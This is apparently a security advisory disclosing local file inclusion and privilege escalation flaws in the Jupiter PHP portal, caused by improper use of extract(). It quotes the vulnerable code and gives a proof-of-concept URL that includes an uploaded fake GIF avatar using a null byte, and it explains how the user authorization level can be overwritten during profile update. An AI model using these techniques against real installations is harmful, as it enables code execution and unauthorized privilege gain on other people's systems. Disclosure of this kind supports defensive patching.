########################## WwW.BugReport.ir
###########################################
###################################################################################
####################
Quote from vendor: "Jupiter is one of the most lightweight portal
systems available and it`s open source".
####################
Improper use of extract() result in multiple vulnerability Such as LFI & PE
±->Local File Inclusion (Remote Code Execution)
Code Snippet:
/index.php line#609-615
if(isset($n))
{
if(file_exists("$n.php"))
{
if(strpos($n, "…/") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
It's possible for an attacker to set $n variable! although we have a
backward directory traversal check but because of index.php exists in
the main directory of application
Attacker can upload php codes with image/gif type and include it from
images/avatars directory!
POC: http://localhost/jupiter/index.php?n=images/avatars/aa.gif%00
±->Privileges Escalation
There is a logical weakness in $db->updateRow() which could result in
privileges escalation in conjunction with extract() weakness in
profile update process.
Code Snippet:
/include/functions_db.php line#158-174
function updateRow($table,$array,$condition)
{
if(count($array)==0) return;
$q="UPDATE $table SET ";
foreach($array as $index=>$value)
{
if($value==NULL)
$q.="`$index`=NULL, ";
else
{
$value=mysql_escape_string($value);
$q.="`$index`='$value', ";
}
}
$q=substr($q,0,-2)." WHERE $condition LIMIT 1";
$this->query($q);
}
/modules/panel.php line#328-344
$tmp['email'] = $editemail;
$tmp['url'] = $editurl;
$tmp['flag'] = $editflag;
$tmp['location'] = $editlocation;
$tmp['age'] = $editage;
$tmp['hideemail'] = $edithideemail;
$tmp['calendarbday'] = $editcalendarbday;
$tmp['msn'] = $editmsn;
$tmp['yahoo'] = $edityahoo;
$tmp['icq'] = $editicq;
$tmp['aim'] = $editaim;
$tmp['skype'] = $editskype;
$tmp['signature'] = $editsignature;
$tmp['aboutme']= $editaboutme;
$tmp['templates']= $edittemplate;
$db->updateRow("users",$tmp,"id={$user['id']}");
$tmp[authorization] which handles users access level can be set at
this point with $_GET ,$_POST or $_COOCKIE because of improper use of
extract();
####################
####################